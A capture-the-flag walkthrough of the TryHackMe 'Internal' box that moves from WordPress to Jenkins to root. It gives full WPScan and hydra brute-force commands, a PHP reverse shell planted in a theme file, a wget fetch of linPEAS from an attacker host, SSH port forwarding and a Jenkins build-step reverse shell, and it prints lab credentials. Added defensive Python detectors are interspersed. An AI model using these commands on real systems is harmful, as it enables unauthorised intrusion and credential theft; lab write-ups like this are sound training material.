Internal – Walkthrough

Disclaimer -> All passwords and flags have been masked to comply with the rules for official TryHackMe writeups.


URLs for this post

Enumeration

nmap (../scans/_full_tcp_nmap.txt)

As always we check the full TCP scan first, and the result is pretty manageable.

So what do we have?

  • Port 22 SSH
  • Port 80 Web Server

Operating System: Ubuntu Linux

Software: Apache 2.4.29; OpenSSH 7.6p1

As there is a web server, the gobuster log file is worth a look.

GoBuster (../scans/tcp_80_http_gobuster.txt)

gobuster

Website

On index.html the web server shows the default Apache page. On /blog we get a generic WordPress page. With that in mind we can use a nice tool to pull more information out of WordPress sites.

standard wordpress site

WPScan allows us to automatically enumerate the WordPress instance, checking all posts for usernames, plugins, themes and more.

wpscan --url http://internal.thm/blog -e

we “only” got one user and no other vulnerable plugins

With a username in hand, our mission is to get a password for it. Luckily WPScan comes with a brute-force feature: by providing a wordlist we can let it run with the following command.

wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt

#success

Time to log in, check out any interesting posts and find where we can put our file for a reverse shell!

got a private post with credentials

The plugins were write-protected and I had to take a look at the theme editor. In the running theme we can edit, e.g., the file 404.php and plant our code there. Source of PHP Code

Reverse Shell Blog

Make sure that you put in your IP and a desired port for the listener.

404.php with the PHP Reverse shell code

Immediately start our listener and visit the page in the browser or via curl.

nc -nlvp 4444

curl http://internal.thm/blog/wp-content/themes/TwentySeventeen/404.php

hello rev shell my old friend

Best practice is to stabilize our shell with python.

#remote
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press CTRL^Z to put the shell in the background
#local
stty raw -echo; fg
#remote
export TERM=xterm
reset

Now we have tab completion and will not lose our shell by hitting CTRL^C. Because things are going so well, we start our local HTTP server and upload linPEAS for local enumeration and possible privilege escalation vectors. Start the web server in the directory where the files you want to share are stored. Download the script, make it executable and pipe the output into a log file so you can take a look at it afterwards.

Tip: less -r will show you the colored output.

#local
sudo python3 -m http.server 80
#remote
wget http://attackerIP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log

Snippets of linpeas.log

/var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress123' );
define( 'DB_HOST', 'localhost' );
[+] Searching passwords in config PHP files
$pwd    = trim( wp_unslash( $_POST['pwd'] ) );
$dbpass='B2Ud4fEOZmVq';
$dbuser='phpmyadmin';

Unfortunately these credentials won't help us here, but as this is a penetration test we put them in our notes. What else we can write down is that there is another local user on that box.
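As a defender's counterpart to this finding, the following Python is an added example (not from the original writeup) that audits a wp-config.php for the two problems the linPEAS snippet shows: the file is readable by accounts other than the web server's, and the database password is derived from the user name. The sample config is constructed from the values above; audit_file and the idea that an admin runs it on the host are assumptions.

```python
import os
import re
import stat

# Matches the define() lines linPEAS pulled out of wp-config.php above.
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

def audit_wp_config(content, mode):
    """Return findings for a wp-config.php with the given text and permission
    bits (e.g. 0o644). The web server's user has to read it, but no other
    account on the host should be able to, and the DB password should not be
    derived from the DB user name as it is on this box."""
    findings = []
    defined = dict(DEFINE_RE.findall(content))
    secrets = ", ".join(sorted(k for k in defined if k in ("DB_USER", "DB_PASSWORD")))
    if mode & stat.S_IROTH:
        findings.append(f"world-readable ({oct(mode & 0o777)}): exposes {secrets}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group/other: config could be modified by a local user")
    user, password = defined.get("DB_USER", ""), defined.get("DB_PASSWORD", "")
    if user and user.lower() in password.lower():
        findings.append("DB_PASSWORD contains DB_USER: trivially guessable")
    return findings

def audit_file(path):
    """Run the audit against a real file (assumed to be run by an admin on the host)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_wp_config(fh.read(), os.stat(path).st_mode)

# Constructed sample reproducing the values shown in the linPEAS snippet.
SAMPLE_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress123' );
define( 'DB_HOST', 'localhost' );
"""
```

A clean result (no findings) needs mode 640 or tighter with the web server's group as owner group, plus a password unrelated to the user name.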

A snippet of cat /etc/passwd shows us:

aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash

After a while I found a text file in /opt.

www-data@internal:/opt$ cat wp-save.txt

Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:[CONFIDENTIAL]

It seems that we found a pair of credentials and we'll use them straight away with ssh.

ssh aubreanna@internal.thm

Now grab that user flag and check out the rest of the home directory.

home directory of aubreanna

The jenkins.txt tells us “Internal Jenkins service is running on 172.17.0.2:8080” and we can confirm that with the command ss -tulpn.

At this point we have to forward port 8080 from that machine to us with

ssh aubreanna@internal.thm -L 8080:localhost:8080

Now we can access the service on our attacking machine via http://localhost:8080

a wild jenkins appears

Ok, none of the credentials we found work. The default username of a Jenkins installation is “admin”, so let's capture a login request with Burp Suite and fire up hydra with the correct HTTP parameters.

login request

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f
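On the defensive side, both brute-force steps in this walkthrough (WPScan against /blog/wp-login.php and hydra against Jenkins' /j_acegi_security_check) leave a dense run of POSTs from one source IP in the web server's access log. The following Python is an added example, not part of the original writeup, that flags such runs over constructed Apache combined-format log lines; the sample lines, source IP, timestamps and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format (the box runs Apache 2.4.29).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Login endpoints hit in the walkthrough: the WordPress form and Jenkins' Acegi form.
LOGIN_PATHS = {"/blog/wp-login.php", "/j_acegi_security_check"}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return alert tuples (kind, ip, path, count). 'bruteforce' fires once when an
    IP POSTs to a login endpoint `threshold` times within `window_s` seconds.
    WordPress re-renders the form with 200 on failure and answers 302 on success,
    so a 302 after the alert is reported as 'probable_success' (Jenkins answers
    302 either way, so only the rate check applies there)."""
    recent = defaultdict(deque)          # (ip, path) -> timestamps inside the window
    alerts, alerted = [], set()
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append(("bruteforce", rec["ip"], rec["path"], len(q)))
        if key in alerted and rec["path"].endswith("wp-login.php") and rec["status"] == 302:
            alerts.append(("probable_success", rec["ip"], rec["path"], len(q)))
    return alerts

# Constructed sample (assumed IP and times): six guesses in 20 s, the last one succeeds.
SAMPLE = [
    f'10.10.14.5 - - [01/Oct/2020:12:00:{s:02d} +0000] "POST /blog/wp-login.php HTTP/1.1" '
    f'{status} 3200 "http://internal.thm/blog/wp-login.php" "Mozilla/5.0 (constructed)"'
    for s, status in zip(range(0, 24, 4), [200, 200, 200, 200, 200, 302])
]
```

Run detect_bruteforce over the lines of access.log (or the reverse proxy's log in front of Jenkins) and forward the alerts to whatever fires fail2ban or your SIEM.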

hail hydra!

Reverse Shell Docker

After logging in we can build a new project (Freestyle Project) and plant our command for a reverse shell in the build process.

Add Build step – execute shell

As usual we start our listener with nc -nlvp 4444 before we hit the “Build Now” button.

works as expected

Privilege Escalation

This part will be a quick one. No kernel exploit, no sudo misconfiguration or other unpatched binaries. Just a note with credentials, which is still a thing “in the wild”.

jenkins@jenkins:/opt$ cat note.txt

Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.

root:[CONFIDENTIAL]

Thanks for reading and cya!
